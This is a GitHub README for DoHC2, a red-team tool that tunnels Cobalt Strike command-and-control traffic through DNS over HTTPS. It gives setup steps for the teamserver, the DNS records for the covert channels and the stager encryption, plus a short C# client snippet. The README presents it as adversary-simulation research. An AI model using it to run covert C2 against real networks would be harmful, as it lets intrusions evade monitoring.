DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH).
Switch branches/tags
Nothing to show
Clone or download

README.md

DoHC2

DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com).

Presentation

This project was released on October 23rd 2018 at Mitre ATT&CKcon.

Slides: Playing Devil’s Advocate to Security Initiatives with ATT&CK

Blog Article: DOH! DNS Over HTTPS Poses Possible Risks to Enterprises

Diagram

Screenshot

Usage

  1. Install and launch Cobaltstrike teamserver.
  2. Launch a beacon_http/beacon_https listener - Gotcha This can be firewalled off but you need this for External C2 to work.
  3. Load in script 'external_c2.cna' to Start ExternalC2 port 2222 (Firewall off).
  4. Install dependencies for python3 server.
  5. Allow port 53/udp to Internet (or to the DoH provider IP ranges).
  6. Create an A record on your domain to point to the teamserver/DNS server IP i.e. [A] entry.example.org -> 000.000.000.000
  7. Create an NS record to point to the A record for send channel (INPUTDOMAIN) i.e. [NS] send.example.org -> entry.example.org.
  8. Create an NS record to point to the A record for receive channel (OUTPUTDOMAIN) i.e. [NS] receive.example.org -> entry.example.org.
  9. Change INPUTDOMAIN and OUTPUTDOMAIN in DoHC2.py. Change encryption key/IV - this is used to encrypt the path from Teamserver-->Client Only (Encrypts Stager). Change max_records from 1 depending on DoH provider, some providers reorder records returned which is not currently handled. Max 5 works well with DNS server.
  10. Launch python3 DNS server.
  11. Build ExternalC2 library. Change encryption key/IV in DoHChannel.cs to match python3 server.
  12. Configure and launch DoHC2() as below being sure to set INPUTDOMAIN, OUTPUTDOMAIN and a DoH provider in format 'https://resolver.example.org/dns-query'.

Server

Python DNS server based on ACME DNS Server

  • This interfaces raw DNS to the Cobalt Strike Teamserver on 127.0.0.1:2222 by default.
  • Change INPUTDOMAIN and OUTPUTDOMAIN to be hosts that are NS of the server's external IP:
	pip3 install -r requirements.txt
	sudo python3 ./DoHC2.py

Library

@ryhanson's ExternalC2 with the following additions:

Example Client

  • As with rest of ExternalC2 DoHC2 is COMVisible for JScript/DotNetToJS but this is a simple example to initiate it.
  • The example client DoHC2Runner is a simple C# program to demo loading the library and setting it up as follows:
	DoHC2 doh = new DoHC2();
	doh.Configure("<INPUTDOMAIN>","<OUTPUTDOMAIN>","<DoH URI i.e. https://dns.google.com/resolve or https://dns.example.org/dns-query");
	doh.Go();

Authors

License

DoHC2

Some elements created by David Middlehurst, SpiderLabs as described above (Please refer to resepective licenses where other open-source projects are utilised).

Copyright (C) 2018 Trustwave Holdings, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

Acknowledgments

Contributers